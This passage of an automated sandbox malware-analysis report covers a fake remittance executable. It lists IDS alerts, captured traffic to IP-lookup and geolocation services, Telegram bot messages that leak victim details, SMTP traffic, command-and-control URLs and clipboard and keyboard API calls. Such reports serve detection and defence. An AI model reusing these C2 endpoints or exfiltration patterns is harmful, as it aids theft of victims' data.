                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49731 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49728 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49736 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49742 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49716 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49744 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49727 -> 208.91.198.143:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49729 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2020:20:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2021:39:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: us2.smtp.mailhostbox.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 25 Sep 2024 13:34:23 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 25 Sep 2024 13:34:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000026FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000393000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000393000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000026FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                  Source: name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000393000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000395000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegSvcs.exe, 00000007.00000002.4562785704.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002F73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.000000000277E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBjq
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002611000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002611000.00000004.00000800.00020000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000007.00000002.4562785704.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.000000000263B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                  Source: RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegSvcs.exe, 00000007.00000002.4562785704.0000000002F64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.00000000027AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002F6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBjq
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49745 version: TLS 1.2
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_0045A10F
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
